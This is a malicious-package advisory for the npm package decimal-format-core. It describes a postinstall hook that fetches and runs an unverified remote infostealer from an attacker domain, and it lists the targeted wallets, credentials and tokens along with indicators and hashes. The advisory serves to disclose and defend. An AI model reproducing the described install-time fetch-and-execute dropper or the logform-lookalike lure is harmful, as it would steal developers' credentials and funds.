mal-2026-6689
Vulnerability from ossf_malicious_packages
Published
2026-06-30 00:00
Modified
2026-06-30 21:37
Summary
Malicious code in decimal-format-core (npm)
Details

Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign. decimal-format-core uses a dropper technique: a postinstall hook executes scripts/install-check.cjs at install time, which fetches a second-stage infostealer payload from the C2 domain logstream-api.online. The infostealer harvests cryptocurrency wallet vaults (MetaMask, Phantom, Solflare, OKX, Coinbase, TrustWallet, Backpack, TronLink), Chrome/Firefox/Brave cookies and credentials, SSH keys, AWS credentials, .npmrc tokens, Docker config, shell history, and password manager databases, then exfiltrates the data to the attacker-controlled server.


-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (41dcb1eea736b0aba6c078a55b8b60553925e6981452e5c4f56e57e419801f87)

On npm install, the package's postinstall script (scripts/install-check.cjs) fetches a JSON config from https://logstream-api.online/config/dfc-sync.json, reads a peerBundle URL from it, downloads a tarball to a temp directory, extracts it into a.peer/ directory, runs npm install inside the extracted tree, then require()s the extracted peer-math.js module and invokes syncSession(). The fetched payload is not pinned, hashed, or signature-verified, and the source host is fully attacker-controlled and mutable. This executes arbitrary remote code in the installer's context as a default consequence of npm install. The package presents itself with description 'Logform-style numeric and text formatting utilities for Node.js loggers' and keywords (logform, logger, format) that target users searching for the legitimate logform logging library, while the README frames the remote fetch-and-exec as a benign 'Enterprise sync / peer bundle' feature; the path runs by default with no opt-in because resolvePeerBundleUrl falls through to the hardcoded homepage URL when env vars are unset.

CWE
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
  • CWE-506 - The product contains code that appears to be malicious in nature.
Credits

{
  "affected": [
    {
      "database_specific": {
        "cwes": [
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          },
          {
            "cweId": "CWE-506",
            "description": "The product contains code that appears to be malicious in nature.",
            "name": "Embedded Malicious Code"
          }
        ],
        "indicators": {
          "evidence_files": [
            {
              "path": "scripts/install-check.cjs",
              "sha256": "4f384fe4808beea005a2d50e4dc6ba8b1fab3fbd669bc12203b72e30ecbc0fa5",
              "tlsh": "ffa1359919a272734ab1ebb8c722941dff1340233521c360f6de96952fb72a4c352dec"
            },
            {
              "path": "package.json",
              "sha256": "1518c8f4a560d8a4e75a08b60c300075c3661ebb73b61d326e7b9196161037e2",
              "tlsh": "50f08b60db180e332ce94e55489a52016aa58ed70a843c0a73d3610c8f8d67b05ff24e"
            }
          ],
          "package_integrity": [
            {
              "filename": "decimal-format-core-3.5.3.tgz",
              "hashes": {
                "sha1": "8c8aab3306761d72a6b351a8f2054938d01aef81",
                "sha512_sri": "sha512-IauqZcUdFWIgK9kfIMCVnaHTsr/KoknMw7T7E9snQnExX70wRJE51zGg1aG2seGvm3smC/HAJ7IMK3m3Y5gBig=="
              }
            }
          ]
        },
        "iocs": {
          "domains": [
            "logstream-api.online"
          ]
        }
      },
      "package": {
        "ecosystem": "npm",
        "name": "decimal-format-core"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            }
          ],
          "type": "SEMVER"
        }
      ],
      "versions": [
        "3.5.3",
        "3.5.2"
      ]
    }
  ],
  "credits": [
    {
      "contact": [
        "inspector-research@amazon.com"
      ],
      "name": "Amazon Inspector",
      "type": "FINDER"
    },
    {
      "contact": [
        "https://safedep.io"
      ],
      "name": "SafeDep",
      "type": "FINDER"
    }
  ],
  "database_specific": {
    "malicious-packages-origins": [
      {
        "id": "IN-MAL-2026-007812",
        "import_time": "2026-06-30T21:35:49.457963069Z",
        "modified_time": "2026-06-30T20:58:36Z",
        "sha256": "7b2044c0f0e89b9329d67d82ec5e5308318aa06503c4e7c2065f9211d00159d2",
        "source": "amazon-inspector",
        "versions": [
          "3.5.3"
        ]
      },
      {
        "id": "IN-MAL-2026-007811",
        "import_time": "2026-06-30T21:35:49.345220775Z",
        "modified_time": "2026-06-30T20:58:25Z",
        "sha256": "41dcb1eea736b0aba6c078a55b8b60553925e6981452e5c4f56e57e419801f87",
        "source": "amazon-inspector",
        "versions": [
          "3.5.2"
        ]
      }
    ]
  },
  "details": "Malicious npm package published as part of a coordinated DeFi-themed infostealer campaign. `decimal-format-core` uses a dropper technique: a `postinstall` hook executes `scripts/install-check.cjs` at install time, which fetches a second-stage infostealer payload from the C2 domain `logstream-api.online`. The infostealer harvests cryptocurrency wallet vaults (MetaMask, Phantom, Solflare, OKX, Coinbase, TrustWallet, Backpack, TronLink), Chrome/Firefox/Brave cookies and credentials, SSH keys, AWS credentials, `.npmrc` tokens, Docker config, shell history, and password manager databases, then exfiltrates the data to the attacker-controlled server.\n\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (41dcb1eea736b0aba6c078a55b8b60553925e6981452e5c4f56e57e419801f87)\nOn npm install, the package\u0027s postinstall script (scripts/install-check.cjs) fetches a JSON config from https://logstream-api.online/config/dfc-sync.json, reads a peerBundle URL from it, downloads a tarball to a temp directory, extracts it into a.peer/ directory, runs `npm install` inside the extracted tree, then require()s the extracted peer-math.js module and invokes syncSession(). The fetched payload is not pinned, hashed, or signature-verified, and the source host is fully attacker-controlled and mutable. This executes arbitrary remote code in the installer\u0027s context as a default consequence of `npm install`. The package presents itself with description \u0027Logform-style numeric and text formatting utilities for Node.js loggers\u0027 and keywords (logform, logger, format) that target users searching for the legitimate logform logging library, while the README frames the remote fetch-and-exec as a benign \u0027Enterprise sync / peer bundle\u0027 feature; the path runs by default with no opt-in because resolvePeerBundleUrl falls through to the hardcoded homepage URL when env vars are unset.\n",
  "id": "MAL-2026-6689",
  "modified": "2026-06-30T21:37:38Z",
  "published": "2026-06-30T00:00:00Z",
  "references": [
    {
      "type": "REPORT",
      "url": "https://safedep.io/defi-infostealer-fake-arbitrage-bot-npm/"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/decimal-format-core/v/3.5.3"
    },
    {
      "type": "PACKAGE",
      "url": "https://www.npmjs.com/package/decimal-format-core/v/3.5.2"
    }
  ],
  "schema_version": "1.7.4",
  "summary": "Malicious code in decimal-format-core (npm)"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.


Loading…

Loading…

Loading…

Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.


Loading…

Detection rules are retrieved from Rulezet.

Loading…

Loading…